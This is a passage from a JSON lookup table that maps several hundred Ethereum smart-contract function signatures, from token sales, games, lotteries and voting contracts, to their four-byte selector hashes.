"0xe6ecc9c1", "setNameAndSymbol(string,string)": "0x5a446215", "getUserReferrer(address)": "0x36144c9a", "setCommittee(address)": "0xbddae40e", "isMainSaleRunning()": "0x3b39becd", "setDistribution(uint256,uint256,uint256,uint256)": "0x0fc709e5", "isPublicTokenSaleRunning()": "0xa8f2d63b", "addItem(uint256,uint256,uint256,uint256)": "0x572b130f", "isPrivateSaleRunning()": "0x2429b755", "changePet(uint256,uint256,uint256,uint256)": "0xf67501f7", "approveUserKYCAndSetReferrer(address,address)": "0xf6d860d1", "addPet(uint256,uint256,uint256,uint256,uint256,uint256)": "0x916a4b57", "updateKYCWallet(address)": "0x5ddc98ba", "setDepot(uint256,uint256)": "0x8e7a1697", "updateVaultWallet(address)": "0xefd71eb0", "setConfiguration(uint256,uint256,uint256,uint256,uint256,uint256)": "0xb48fcdc0", "updateTokenBaseRate(uint256)": "0x855d7c21", "_getAltarRecord(uint256)": "0x6fbcd1fb", "updateMaxTxGasPrice(uint256)": "0x8111e0ad", "_getCurrentAltarRecordId()": "0xf194c23f", "goBackToPreSale()": "0x1dcb0d36", "tradeBookOf(address)": "0xd1a61025", "startMainSale()": "0x580e77d4", "ethereumFromAltar()": "0x98d714ac", "goBackToPrivateSale()": "0x412956ce", "chickenToAltar(uint256)": "0x41ad3f57", "mintReferralShare(uint256,address,uint256)": "0xd0ca7379", "withdrawStoreBalance()": "0x28b8b108", "checkTotalsAndMintTokens(address,uint256,bool)": "0x8884fbec", "cancelReservedTokens(address,uint256)": "0xd62c6523", "buyStore()": "0x463ac31b", "confirmReservedTokens(address,uint256)": "0x6d160f31", "buyPets(uint256,uint256)": "0x045f955b", "reserveTokens(address,uint256)": "0x78cf19e9", "buyDepots(uint256)": "0x76587847", "SealTokenSale(address,address,address,uint256,uint256,uint256,uint256)": "0xc7ea07bb", "_gapOfCubeSum(uint256,uint256)": "0xef0901b8", "_gapOfSquareSum(uint256,uint256)": "0x9b1b8f62", "upgradeMaterial(uint256)": "0x8847092d", "upgradeStructure(uint256)": "0x69fbfcc4", "upgradeDexterity(uint256)": "0x1fa08755", "upgradeStrength(uint256)": "0xd583644b", "_houseOf(address)": "0xc949c0c9", "_unclaimedChickenOf(address)": "0xcadf74e2", "matchcoin(uint256,string,string)": "0xa27b9bf4", "_payEthereum(uint256)": "0xd21e17a6", "_payEthereumAndDistribute(uint256)": "0x2c445273", "_payChicken(address,uint256)": "0x8cbcbca2", "chickenOf(address)": "0x63fd7eb0", "transferChickenFrom(address,address,uint256)": "0xca1a3086", "saveChickenOf(address)": "0xde2f827e", "_giveShares(address,uint256)": "0x757e5e73", "partnerInfo_for_Owner(address,bytes32,uint8,bytes32,bytes32)": "0x6b8ce30e", "redeemShares()": "0xb460481d", "getTokensBought()": "0x78498818", "setTokensBought(uint256)": "0x44f34576", "changeUserEthAddress(address,address)": "0x4c9b60dc", "getAllUsers()": "0xe2842d79", "getUnapprovedUsers()": "0xf1806a21", "getUnapprovedUsersTop150()": "0x0fc7c15e", "ADSToken(address,address)": "0x2304ede4", "closeUser(address)": "0x9bbc574a", "getUsersAwaitingForTokens()": "0x9e29eb0f", "HexelErc20Token(string,string,uint256)": "0x4bb9962f", "getUsersAwaitingForTokensTop150()": "0x08436588", "transferOutAllEthers()": "0x6c510377", "refundMultipleUsers(address[])": "0x8f6a7286", "refundSingleUser(address)": "0x7ba201c5", "distributeTokensToAllUsers()": "0x3d908c82", "distributeTokensToApprovedUsers()": "0x82be0ccd", "approveMultipleUsers(address[])": "0x4c585ce4", "raiseJackpot()": "0xa2624afe", "disapproveSingleUser(address)": "0xc636813e", "MumsTheWord()": "0xcf67805c", "approveSingleUser(address)": "0xbd902dad", "changeStartAndEndDate(uint256,uint256)": "0x032b642d", "determineBonus(uint256,uint256)": "0xd216995b", "TWD_Omnidollar()": "0x2a70214a", "ms0()": "0xd1631361", "changeVault(address)": "0x60e232a9", "airdropAndVault()": "0xc7e3b6e8", "GMCB()": "0x525c3966", "SabrinaToken()": "0x1e8784c9", "getTransferAgentStatus(address,bytes32,address)": "0x915cfeac", "bonusDeadline()": "0x0ef2d7af", "startline()": "0x1ffe4cca", "locked_allocation()": "0xeb614fc7", "secretNumber()": "0xc36604ed", "officiant()": "0x802b1d93", "COOLDOWN_TIME()": "0x7d263245", "platformSupply()": "0x75288d95", "otherCurrenciesChecker()": "0xaf2fa91c", "bustRange()": "0xfaa7fc61", "rateRound1()": "0x5d41363f", "spenderAddress()": "0xbab5b64e", "maxTokensWithBonus()": "0xb06e64ca", "presalePart()": "0x950c84e4", "salePaused()": "0x5d08c1ae", "round1InitialBonus()": "0xc486d133", "currentRoundMultiplier()": "0xa49bb55c", "tokenCreationCapOne()": "0xac6e2db6", "abx_token()": "0xdb6bbeb2", "isHoldTokens()": "0x6e44fcea", "maxPendingBalances()": "0x8d927b34", "ONE_HUNDRED_PERCRENTS()": "0x0fb792d0", "tokensForPreICO()": "0x471efce5", "ico1Sold()": "0x5454fb7c", "contributionMaximum()": "0xd0f17d41", "CLAIM_AMOUNT()": "0x270ef385", "currentMaximumSalePercentage()": "0xfb10b0d3", "currentLotteryId()": "0x6be4097c", "burnAllLeftTokens()": "0xc7028f96", "getPriceSMPTokensPerWei()": "0xf6da1c0a", "makerBetsCount()": "0x863f52b4", "mainsale()": "0xf6fc96ad", "profitAddress()": "0x123702e2", "issuePrice()": "0x5c2c2005", "tricklingSum()": "0x335e8067", "partner2_voted_update_marriage_status()": "0xc7e975b8", "stage1Bounty()": "0xf45efe88", "totalToken()": "0x626be567", "AUTH_SETMINTAMOUNT()": "0xac7f9329", "ownerCountInt()": "0x332fa5bb", "airdropCountLimit2()": "0x857512b4", "crowdsaleOpened()": "0x1fd55a8a", "_endEdit()": "0xdd004ca8", "CPO_SHARE()": "0x774685c7", "totalGoldSupply()": "0x4d7559a8", "_totalBurnedTokens()": "0x91fe5a64", "totalWeiRaisedDuringPhase3()": "0xfae72303", "tierContract()": "0xa30872db", "last_demurrageable_balance()": "0x59ceb36f", "priceStep2()": "0xb7e0308d", "refund_contract_eth_value()": "0x4915ef4a", "auctionSuccessBonus()": "0x4ccb908f", "preSeedAllocation()": "0xf3465181", "ICOPaused()": "0x7f3d5c4c", "mainSaleDate()": "0xfc317cbe", "JointICOBonusAmount()": "0x0da108ff", "quantityFactor()": "0xa7de9c63", "pregnantMonsters()": "0xc7e3ff4b", "globalOperator()": "0xe20dc05b", "JackpotPayout()": "0xbc97a8ac", "totalMigrated()": "0x95a0f5eb", "currentLotteryValue()": "0x8e04977d", "AML_THRESHOLD()": "0xb6607cc5", "startBuyBackDate()": "0xca7e321f", "ReleaseFundsToInvestor()": "0x3738aa19", "level_1_percent()": "0xaa7ebf43", "Denar()": "0x0a18c334", "ballotFee()": "0xdbf1bfee", "ARBITRARY_VALUATION_IN_ETH()": "0xfed9d44f", "oldE4RecycleBin()": "0xf9e856ae", "TOKENS_PER_ETH()": "0xbc6e6604", "tokenLedger()": "0x3886c957", "DIALSSPUN()": "0x10d7b903", "totalDragons()": "0x00046c1f", "upgradable()": "0xf4d26fec", "banThreshold()": "0x312ad4b9", "mainSaleTotalSupply()": "0x945ddb52", "allCrowdSaleTokens()": "0x344bcd7d", "FRAC_BOT()": "0x80117026", "SALE_CAP()": "0x0b45e8db", "teamETHUnlock1()": "0xcb381b61", "lastPriceCheck()": "0xa4efc580", "minimumFee()": "0x1a7626e7", "kittensRemainingToDrop()": "0x6bcc28a9", "INITIAL_VALUE()": "0x5f677404", "minPay()": "0x82d18650", "scamStampTokenAddress()": "0x39ecc94f", "collectedEthers()": "0x0200b10d", "cnt_per_eos()": "0x186eb86b", "contractPrice()": "0x97e9a0bf", "icoDays()": "0x94ad4f89", "tokensForDevteam()": "0xf1395f3f", "Symbol()": "0x3045aaf3", "winningTeamSet()": "0x25ee8abb", "EGGS_TO_HATCH_1SNAKE()": "0xcd1a8ad7", "picosCap()": "0x2abaa0c9", "deadline365()": "0x7f64c34e", "pregnantpuppies()": "0xa4acbcd6", "sponsor()": "0x77c93662", "parameterizer()": "0xe1e3f915", "stopGameOnNextRound()": "0x93e3fca1", "PRCT_TEAM()": "0x3d68011a", "tokensIssuedPrivate()": "0x386e3441", "totaldividends()": "0xbda393d3", "BRONZE_AMOUNT_TPT()": "0x1c9fe5d7", "startPreSaleStage()": "0xaa052bd1", "TOKEN_AMOUNT_ICO_STAGE1_PRE_SALE5()": "0x2a3e6ba1", "resolver()": "0x04f3bcec", "jackpotAmount()": "0xb1eac37e", "crowdsaleSold()": "0x059eb515", "stopSales()": "0x56cba008", "MIN_SHARE_OF_POWER()": "0x70c4f2e1", "USEaddress()": "0x3869eaff", "destinationAddress20()": "0x45eb4b28", "hodlerReward()": "0x1f816c6d", "tokensPending()": "0x04d0ac48", "getEthPhiRate()": "0xb14debe4", "XPAToken()": "0x05df5e86", "ratio()": "0x71ca337d", "minVote()": "0xa39ad747", "serviceAgent()": "0x43a77530", "secondCapEndingBlock()": "0x2b913151", "_SUTokenContract()": "0xbaf8c622", "payAllRewards()": "0xcc147334", "numberOfTokenHolders()": "0x178ef307", "launchTime()": "0x790ca413", "changesLocked()": "0x92731aaa", "minEthAmount()": "0x19fc5b88", "cut()": "0xe6fd604c", "rewardThree()": "0x8a063d91", "teamFund()": "0x5495699f", "preSaleDiscountPrice()": "0x4415a0bf", "singleTransGasCost()": "0x3406e3fb", "votesNo()": "0x2ab13037", "turnOffCanUpdateNextGameMinAndMaxBlockUntilGameEnd()": "0x82d9b9bb", "getUnlocktime()": "0x748f7215", "sumHardCapICO1()": "0x7dcd17d9", "lockExpiration()": "0x64ce1068", "releaseTime4()": "0x1e141bb0", "tradeToken()": "0xd83678ac", "servicePercentage()": "0x3f37c9d4", "total_iou_purchased()": "0x98ef4b0b", "prevSeriesSelloutHours()": "0x63eda29d", "totalBunniesCreated()": "0x8a9c497b", "secondPresaleStart()": "0xd394a12e", "LKCTotalSupply()": "0x67c353b3", "mln()": "0xdf90f719", "MIN_BUY_TOKENS()": "0xe3c5d11a", "CPLTokenDeposit()": "0x3fb655a3", "rare()": "0x6bb7b7a4", "StageThreeDisable()": "0x8229268b", "RESERVE_PERCENT_EVE()": "0x8ef1e886", "ICOstate()": "0x3a2c7a37", "disableSuicide()": "0xb049474d", "capWEI()": "0x84a9b91c", "lastBlock_a13Hash_uint256()": "0x9fcf89ee", "tau()": "0xcfc4af55", "releaseTokenForTransfer()": "0x28e665ef", "fights()": "0x6cd8f772", "getPayoutReadyState()": "0xefd0c851", "YHT()": "0xe1d4efc4", "User_3()": "0xbeb9571c", "migrateAgent()": "0x0b2e02c7", "buyStarterPack()": "0xf1145727", "foundersReserve()": "0x7b86120a", "tokensPerEthPublicSale()": "0xe0020f1a", "itemsForSaleCount()": "0x132ac1dd", "tokenIssueIndex()": "0x41becaef", "ICOReserveWithdrawn()": "0x9e8ab40c", "userDeposit()": "0x48146113", "canUpdateNextGameMinAndMaxBlockUntilGameEnd()": "0x355f7ea7", "initialBonuslistTokens()": "0xe3aa3c6e", "fourthBonusSalesEnds()": "0x83e3607c", "RESERVED_COMPANY_GROUP()": "0x2a8f368b", "minCost()": "0x5b6a9eb4", "successfulTransactions_()": "0x0a3c34fb", "MAX_SITE_TOKEN_ID()": "0x030a78aa", "mktTokenCap()": "0x82f39e2f", "libAddress()": "0x29fd50eb", "IsAirDropEnabled()": "0x883a6476", "receivedDividends()": "0x0951b3ac", "OK()": "0xd48fe280", "TRANSACTION_MIN_IN_ETH()": "0xc0db4dd7", "result_hash()": "0xca92a136", "sell_ppc()": "0x6432dc4e", "icoStartBlock()": "0x12ea965d", "purchased_tokens()": "0x48c2f845", "API2()": "0x9932fa28", "Fee()": "0xbef7a2f0", "restrictedShare()": "0xbe4f4fdf", "end_time()": "0x16243356", "timeInvestInMinute()": "0x1296aef3", "ratioDenominator()": "0x3b242439", "totalJackpotEven()": "0x884fafcd", "totalBountyinWei()": "0x866b5674", "organizer8()": "0x2fc64ff7", "lockedBalanceCount()": "0x34f96971", "MAX_CARS_TO_GIFT()": "0x9f1ae6ac", "credit()": "0xa06d083c", "currentWallet()": "0x5a9aa592", "userAmount()": "0x47688c74", "check_withdrawdao()": "0xefdecd9b", "CheckUserVote(uint8,uint8)": "0x22d8cf5b", "check(uint256)": "0x5f72f450", "checkTransferWithReference(address,uint256,string)": "0xcbcaacab", "checkTransferToICAPWithReference(bytes32,uint256,string)": "0x058026d0", "checkTransferToICAP(bytes32,uint256)": "0x8e4afa51", "checkTransferFromWithReference(address,address,uint256,string)": "0xc6e0c908", "checkTransferFromToICAPWithReference(address,bytes32,uint256,string)": "0xbd8c1d33", "checkTransferFromToICAP(address,bytes32,uint256)": "0x00a7d6b3", "checkTransferFrom(address,address,uint256)": "0xc5575ef0", "checkTransfer(address,uint256)": "0x88e072b2", "checkTimeout(uint256)": "0x5329c681", "checkTime()": "0xe0c6190d", "CheckTickets()": "0x3c959aca", "_checkSigned(bytes32,uint256,uint8,bytes32,bytes32)": "0xef19c332", "checkSetCosignerAddress(address)": "0xb623f5e5", "CheckPrize(address)": "0xbed411a0", "checkNumbers(uint8[3])": "0xb2bfd948", "checkMyWithdraw(address)": "0x33893071", "checkMyWithdraw()": "0x4c7a2254", "checkInvariants()": "0x0343dfa0", "checkIfExploded()": "0x255016c8", "CheckHash(uint8,uint8,uint8,uint8,bytes32)": "0x0382c254", "checkHash()": "0x19483cd1", "checkForward(bytes)": "0x119aa5c8", "checkFormat(string)": "0xe95bee59", "checkExpiry()": "0x46b207b8", "checkExpiredfunds()": "0x51fdaf92", "checkEarnings(address)": "0xdc3ab866", "checkDepth(address,uint256)": "0x32921690", "checkDate()": "0x1a9360dd", "check_darkdao()": "0xf062e26b", "check_bet(uint256,address,uint8)": "0xc67146a5", "checkBetResult(uint8)": "0x90a85119", "checkBetResult(uint8,address,bytes32,bytes32)": "0x1e5330ca", "checkBetParity(uint8,address,bytes32,bytes32)": "0xe9c31315", "checkBetNumber(uint8,address,bytes32,bytes32)": "0x40c0bcb9", "checkBetLowhigh(uint8,address,bytes32,bytes32)": "0x75830463", "checkBetDozen(uint8,address,bytes32,bytes32)": "0x74388347", "checkBetColumn(uint8,address,bytes32,bytes32)": "0xf2b904c3", "checkBetColor(uint8,address,bytes32,bytes32)": "0x20e647e1", "checkApprove(address,uint256)": "0xede8ebf3", "check(address)": "0xc23697a8", "check()": "0x919840ad", "chase()": "0xcdcb7c8f", "ChangeReuseCashInHarware(bool,uint16,uint16)": "0x1982ed58", "changeRankingSize(uint256)": "0x0fffbb54", "changePig(address)": "0xc0b92612", "ChangeOwnership(address)": "0x244ded7a", "changeOwnerAddress(address)": "0x85eac05f", "changeName(address,string)": "0x45ca25ed", "changeMaxMultiplier(uint256)": "0xa51aea2d", "changeMaxDeposit(uint256)": "0x53fefd7d", "changeLeaderMessage(string)": "0x07a9574a", "changeId(uint256,uint256,uint256)": "0xeb1ff845", "changeHouseAddress(address)": "0x1efb17ee", "changeHashtoLowOrHigh(uint256)": "0x62ee6d29", "changeGasLimitOfSafeSend(uint256)": "0xd21d7950", "changeFounder(address)": "0x93c32e06", "changeFee(uint256)": "0x6a1db1bf", "changeEligibleDonkeys(uint256)": "0x3fd94686", "changeDomain(uint256,uint256,uint256,address)": "0x75090ebf", "changeDescription(address,string)": "0x1ed6f423", "changeBaseMultiplier(uint256)": "0x839849c0", "ChangeActiveDigger(address)": "0xdabdc1f2", "Chainy()": "0x0f096163", "certify(address,bytes32)": "0x5103a5a3", "CertifierDb()": "0xf72457af", "CertificationDb(address,uint256,address)": "0x35d79fad", "CertificationCentre(address)": "0x05b2b03a", "censorship(uint256,bool,bool)": "0x4a30f976", "cashOutProfit()": "0xe2861c8d", "cashAllOut()": "0x4bb4b260", "carrotsCaught()": "0x5cff876b", "carefulSendWithFixedGas(address,uint256,uint256)": "0x1d3390a1", "cancel(string,uint256)": "0x06909f69", "cancelSellOrder()": "0x39b50688", "cancelSellOrder(address)": "0x6618b008", "CancelRoundAndRefundAll(uint256)": "0x9d1bbd7e", "CancelRoundAndRefundAll()": "0x3fb0b2c9", "cancelOrder(bool,uint256)": "0xdc419fd8", "cancelOrder(address,uint256,address,uint256,uint256,uint256,address,uint8,bytes32,bytes32)": "0x74e60a48", "campaignEndedSuccessfully()": "0xdcf8113e", "CalculateSqrt(uint256)": "0x671dacdc", "calculateShare()": "0xc03e382f", "calculateFeeDynamic(uint256,uint256)": "0xc1cc0775", "calcRevenue(address)": "0xea295ec2", "CalcAll()": "0x4dc3141b", "CafeMaker()": "0x4dda1764", "CafeDelivered()": "0xb412d4d6", "buyUnit(uint256,uint256)": "0x4b8772c1", "buy(uint8,bytes32,bytes32)": "0xe5fe4f31", "buyTopDog(uint256,uint256)": "0xaaf9d13e", "BuyTicket(uint8,uint8,uint8)": "0x46f7a883", "buyTickets(address)": "0x378c0605", "BuyTicketForOther(address,uint8,uint8,uint8)": "0x920c94df", "buyTicket()": "0xedca914c", "buy(string,uint256,uint16)": "0x90cb04e1", "buyShare(uint256,bool)": "0xcef8d343", "buyRecipient(address,uint8,bytes32,bytes32)": "0xdda44b10", "finishPresale()": "0x974654c6", "timeToFinishPresale()": "0x30986dea", "startPresale(address,uint256)": "0xddf0432f", "CinderTokenSale()": "0x280376b3", "_isActive()": "0x8ec89e4f", "SplitPhaseDistribution(uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,address)": "0xa367b891", "CinderToken()": "0xafa72b9f", "justThrow()": "0xc5072172", "show(uint256,uint256)": "0x9cbd695f", "reply(uint256,uint8)": "0xf0419588", "poll(uint32)": "0xd8d07637", "getLog()": "0x909e4ab6", "cleanLog()": "0xfd32649f", "createReserveTokens()": "0x99a6f7d2", "createBountyTokens()": "0xac51009e", "Campaign(address,address,address)": "0x6907baa9", "theCeiling(uint256,uint256)": "0xd35c7372", "theFloatMultiplier(uint256)": "0x7e09d09b", "theDay(uint256)": "0x8f2e9ee7", "testInitalBalanceUsingNewContract()": "0x2e1c49d9", "testInitalBalanceUsingDeployedContract()": "0x977785c5", "createMemoryArray(uint256)": "0x6d236703", "addFlag(bool[2])": "0xb9cce72c", "byteArrays(bytes1,bytes)": "0x86a57f6f", "changeFlagArraySize(uint256)": "0xf5933f66", "setFlagPair(uint256,bool,bool)": "0x7d7e5e3d", "setAllFlagPairs(bool[2][])": "0xdeff71b8", "getTokens()": "0xaa6ca808", "LicensingToken()": "0xc62631a5", "acceptWork(uint256)": "0x873a2878", "submitWork(address,address,uint256,string)": "0x727648a3", "getWork(address,address,uint256)": "0x50f5ef78", "submitNewClip()": "0xabc38cf2", "blocktubeFarming()": "0x70fe19a3", "InvestorRegistry()": "0x2233db62", "set(bytes20,uint256)": "0x5f5bb161", "Store(bool,uint256)": "0x682a90d2", "TimeDecayingTokenBoundary(uint256,uint256,uint256,uint256,address)": "0xbcab7ad2", "executeVote(uint256[])": "0xfd994513", "getVotes()": "0x0dc96015", "getPublicKeyG()": "0x8475f6f9", "getPublicKeyN()": "0xdb66ef59", "getVoters()": "0xcdd72253", "Ballot(string,string,string,uint256,address[],uint256[],uint256[])": "0x21fa1730", "batchPunchOut(address[],uint64[])": "0xefe86dd5", "batchPunchIn(address[],uint64[])": "0x7a091f95", "addMembers(address[])": "0x6f4d469b", "addAdmins(address[])": "0x9c54df64", "punchOut(address,uint64)": "0x7f191255", "punchIn(address,uint64)": "0x0f2dabca", "getAllAdmins()": "0xe9523c97", "getAllMembers()": "0x7c0f6b35", "getPunchCardsOf(address)": "0x37ac8236", "getMyPunchCards()": "0x739e40b7", "getPunchCardsInternal(address)": "0x85cb4ea2", "addMemberInternal(address)": "0x33012507", "PunchClock()": "0xc5d6c75d", "get_s()": "0x75d74f39", "set_s(string)": "0xe7aab290", "JoyToken()": "0x06ff8908", "revoke(address,bytes32)": "0x88e62721", "getAwarding(address,bytes32)": "0x7bc5af10", "award(bytes32,uint256,address,bool,uint256)": "0xf426ceee", "getBadgeLevel(bytes32,uint256)": "0xe25c9c33", "setBadgeLevel(bytes32,uint256,string,string,bytes)": "0x01beb7cf", "getBadge(bytes32)": "0x77002fcf", "createBadge(string,string,string)": "0x17155659", "UsableToken(uint256,string,uint8,string)": "0x5ac5ec65", "moveToInitiator(address,address,uint256)": "0xa2a746e1", "moveToReceiver(address,address,uint256)": "0xdac84ee4", "sendToReceiver(address,address,uint256)": "0xbca6e8ec", "sendToTarget(address,address,address,address,uint256)": "0xdd47fe15", "getValue(address,address,address)": "0xb709df11", "storeInContract(address,address)": "0x2c0e3850", "test_validShouldBe3()": "0x5325dc16", "Version(string,address,address,bool)": "0xf34df94e", "SimpleContract()": "0x441666c5", "threeParams()": "0xa817ccac", "register(address,bytes32)": "0x1e7a505f", "sampleBoolRetFalse()": "0x2c4aecc1", "sampleBoolRetTrue()": "0x9cf55cfb", "sampleMulti(bool,bytes32,int8,bytes4)": "0xb761962c", "sampleBool(bool)": "0xa4ae32fd", "SimpleNameRegistry()": "0xefc1c0ab", "test_twoInvalidEqBytes()": "0xe9130d4a", "test_threeInvalidEqBytes()": "0xa79c7faf", "test_oneValidEqBytesNoLog()": "0x13788651", "test_twoValidEqBytes()": "0xb55cff2d", "test_threeValidEqBytes()": "0x274bc107", "test_oneInvalidEqBytes2()": "0x79c9e396", "test_oneInvalidEqBytes()": "0x382b6f69", "test_oneValidEqBytes()": "0x6cfb0a4a", "makeACall(address,uint256)": "0x3f5bc9b6", "getFoo()": "0x243dc8da", "Donator()": "0x2c9fcd8c", "nizk_verifyproof(string,string,string,string,string,string,string)": "0x7a5e842a", "nizk_setup()": "0x60baabf3", "public_withdraw(uint256)": "0xd8b3315f", "reveal_registration(uint256,address,address)": "0x64ef563c", "make_anonymous_withdraw(uint256)": "0xdc6668db", "Ethraffle_v3b()": "0xd5f47a51", "MerculetToken(uint256,uint8,string,string)": "0x52e2f9ea", "Ssnc()": "0x089d1239", "transferAnyERC20Token(address,int256)": "0x3a2f6e57", "approveAndCall(address,int256,bytes)": "0x9fcb7100", "Lab51TestToken()": "0xf822372e", "mint(address,int256)": "0xfd9bf3aa", "CheckIfIsAllowed(address)": "0x77f46346", "IsAllowed(address)": "0x8b5dc8a5", "SetSubscriptionTo(address,int256)": "0x13f4318e", "Subscribe(address)": "0x1aec2cf9", "receiveApproval(address,int256,address,bytes)": "0x5cf6a763", "transferFrom(address,address,int256)": "0x192193b9", "approve(address,int256)": "0xd4e12f2e", "transfer(address,int256)": "0xa5f7c148", "safeDiv(int256,int256)": "0xd1d4c4c6", "safeMul(int256,int256)": "0x20396553", "safeAdd(int256,int256)": "0xf997e136", "STWY()": "0x6df15719", "GoldenCurrencyToken()": "0xe122f1b2", "ZontoToken()": "0x5d68564e", "BunnyToken()": "0x2734242b", "TheMostPrivateCoinEver()": "0x964620d2", "sendETH(uint256)": "0x5eee7078", "_transfer()": "0xca9e1993", "updateStages()": "0xfde4b39d", "updateStatusViaTokens()": "0xe5f6d376", "transferExcessTokensToReserve()": "0xac50af76", "setNewICOTime(uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0x60c1461f", "ICO_Graphene()": "0x96038f8f", "getAddListSize()": "0x2d2f8f9b", "getAddressFromList(uint256)": "0x2dbcc104", "restrictedTokensOf(address)": "0x0546a746", "Token77G(address,address,address,uint256)": "0xa1975c38", "checkCompletedCrowdsale()": "0x57a27a76", "setTierRates(uint256,uint256,uint256,uint256)": "0x95c93f8b", "refundTokens(address,uint256)": "0x549c6bbb", "distributeICOTokens(address,uint256)": "0x135859c0", "distributePresaleTokens(address,uint256)": "0x0684c12b", "PallyCoin()": "0x62744fee", "getTotalDiscount(address)": "0x4dc5c69f", "tokenDiscountPercentage(address)": "0xb72413e4", "referralDiscountPercentage(address)": "0x3fded490", "Chicken()": "0xc2d415e2", "SCUDO()": "0x5b3d4b16", "FucksToken()": "0x977f1213", "PajCoin223()": "0xcafa1cde", "MusereumToken()": "0xc1beb1e1", "Nomid()": "0xacb6ca94", "deleteUser(address)": "0x5c60f226", "addFace(string,string)": "0xbd7b7849", "TheImmortals()": "0x165cfea3", "removeFace()": "0x81a3b17f", "TheImmortalsPhoto(string,string,address,address)": "0xa164845a", "totalRefunded()": "0xd9082962", "totalNotCompleted()": "0x96aa6305", "totalLossValue()": "0x1174ca26", "totalWinValue()": "0x6b140854", "totalTokenLossValue()": "0xe0f898e4", "totalTokenWinValue()": "0x958f3624", "totalTokenBetValue()": "0x80a6ee7d", "avgTokenlossValue()": "0x4411c36f", "avgTokenWinValue()": "0xcdde9294", "avgTokenBetValue()": "0xf06b9ca6", "maxTokenlossValue()": "0xb16bd58f", "maxTokenWinValue()": "0x009ca5e8", "maxTokenBetValue()": "0xac42c3ec", "totalEtherBetValue()": "0x9e3d2d06", "avgEtherBetValue()": "0x3885ce81", "getTopWinners(uint256)": "0x3e68aa3a", "flipsLost()": "0xf50fc02e", "flipsWon()": "0x8f850163", "flipsCompleted()": "0x4b73ca04", "getPlayerFlips(address,uint256)": "0x96de56d2", "getTotalFlips()": "0x29aa1408", "getNumberOfFlips(address)": "0x2a1a3303", "withdrawTokens(uint256,address)": "0x398d92bb", "tokenFee(uint256)": "0x23624a10", "setETHFee(uint256)": "0x3e8f682f", "setMaxCoinSides(uint8)": "0xdbe5fe9d", "setMaxAllowedBetInEth(uint256)": "0x7ebdf4ac", "setMinAllowedBetInEth(uint256)": "0x770ae2af", "SetMaxAllowedBetInTokens(uint256)": "0x76f39b28", "setMinAllowedBetInTokens(uint256)": "0x96974e47", "setOracleCallbackGasLimit(uint256)": "0xd01bbdc9", "setOracleCallbackGasPrice(uint256)": "0xac2d456d", "refundFlip(bytes32)": "0x3e38dab8", "_checkGeneralRequirements(uint256,uint8,uint8)": "0xe36255e2", "flipCoinWithEther(uint8,uint8)": "0xa34d7c11", "EthernautsUpgrade()": "0x8b156d4c", "ISBToken()": "0xa6624bf4", "DesToken()": "0xe7278231", "transfersAllowedTo(address)": "0x3ffa274a", "disallowTransfersTo(address)": "0x1f15bc1b", "allowTransfersTo(address)": "0x0202f3ea", "disallowTransfers()": "0x212c8157", "Transferable()": "0x1bf9def0", "unown()": "0xadadc77f", "TalkCrypto()": "0xdb2f1d83", "NovaChain()": "0x15a4d313", "CreditHydraToken()": "0x892cd384", "DayByDayToken()": "0xa213c280", "disablePayable()": "0x663b0534", "enablePayable()": "0x78ce341a", "setMaxPaymentInEther(uint256)": "0x73c8d8a2", "setHardCapInEther(uint256)": "0x97ceb310", "getActualTokensPerEther()": "0x56d95932", "getOwnerBalanceInMilliTokens()": "0xc237898d", "getOwnerBalance()": "0x590791f2", "OxChainNetwork()": "0x9be0f105", "adminGetLastSignedTime(address)": "0x807f3bce", "adminUnsigned(address)": "0xe15d051f", "unsigned()": "0x999f18a6", "getLastSignedTime()": "0x3693396a", "signed()": "0x232a6b9d", "receiveApproval(address,uint256,address,uint8)": "0xecb63011", "updateBalance(uint256,bool)": "0xe54ebe61", "WTechCoin()": "0x534a2f7c", "blacklist(address[])": "0x041f173f", "getstudentInfo(uint256)": "0x01bc757a", "saveStudent(uint256,string,string,address,address)": "0xd8c4cd7d", "transfer(uint256,uint256)": "0x0cf79e0a", "Register(uint256,string,string)": "0x0feb10ff", "UbbCoin(uint256,string,string)": "0xa5c3eb03", "CowToken(address,address,uint256)": "0x633a7574", "TRONIC1()": "0xecb1b31c", "BaoBaoToken(uint256,string,string)": "0xd791ed7a", "SevenStandardToken(uint256,string,uint8,string)": "0x06c7e165", "FakeZRX()": "0xeeac6d78", "getBooking(string,uint256,uint256)": "0x45b50255", "cancelBooking(string,uint256[],uint256,bytes32,bool)": "0x143fcbbe", "bookRoom(string,uint256[],uint256,address,bytes32,uint256,bool)": "0x0a5cced2", "changeRefund(uint8,uint256,uint8)": "0x1b955df4", "addRefund(uint256,uint8)": "0xb2e02fc1", "fillOrder(address[5],uint256[6],uint8,bytes32,bytes32)": "0xc7d7b5a6", "BookERC20EthV1Dec()": "0xd91f3f33", "Volkstest2()": "0x7f56ca73", "Sunshine()": "0xb2bbe75e", "timeLock(address,uint256,uint256)": "0x7aa98fb3", "canTransferIfLocked(address)": "0x2bddb9b5", "distribution(address[],address,uint256[],uint256[])": "0xa5cda792", "confirmChangeOwnership()": "0xe602af06", "BLAAICOIN()": "0x817f688f", "DollarToken()": "0x44b55187", "TourMEToken()": "0x40f523f9", "BHIMToken()": "0x2bda2a49", "setowner()": "0x31e12c20", "ownerTransferAllEther()": "0xbb91f8ae", "updateUser(address,string,uint256,uint256,uint256)": "0x72a1e258", "casamenteiroToken()": "0xb43740c0", "FD(uint256,string,uint8,string)": "0x74f78437", "_addOwner_(address)": "0xb60a7405", "DOGEToken()": "0x710ee68e", "YBToken(uint256,string,uint8,string)": "0x665fb66a", "vehicle_assembled(uint256)": "0x5e8c63bb", "check_part_location(uint256)": "0x552200f5", "part_to_vehicle(uint256,string,uint256)": "0xdead98f6", "pay_to_OEM()": "0x992bc0ce", "defective(bytes32,uint256)": "0xbdd62b7b", "getPoolMoney()": "0x309652ec", "use_OEM_Parts(bytes32,uint256,uint256)": "0xefa56a1e", "buy_part_amount_show(bytes32,uint256)": "0x29415664", "display_time(bytes32)": "0xbca9745c", "display(bytes32)": "0x75a52506", "addparts(bytes32,uint256,uint256,uint256)": "0x000ac1ff", "add_AUTO_MANU()": "0x72d9733e", "add_OEM()": "0xb1a56055", "SomeContract()": "0x69c338ff", "NextGenHyip()": "0x7690bee4", "FindTheCureCoin2()": "0x41f6e77e", "esercita_potere_pubblico()": "0x603601d5", "vota_un_candidato(address)": "0xe00bc7fb", "assegna_diritto_di_voto(address)": "0x538564de", "registrazione_candidato(string)": "0x054ded2b", "debug_is_dry()": "0x1182c796", 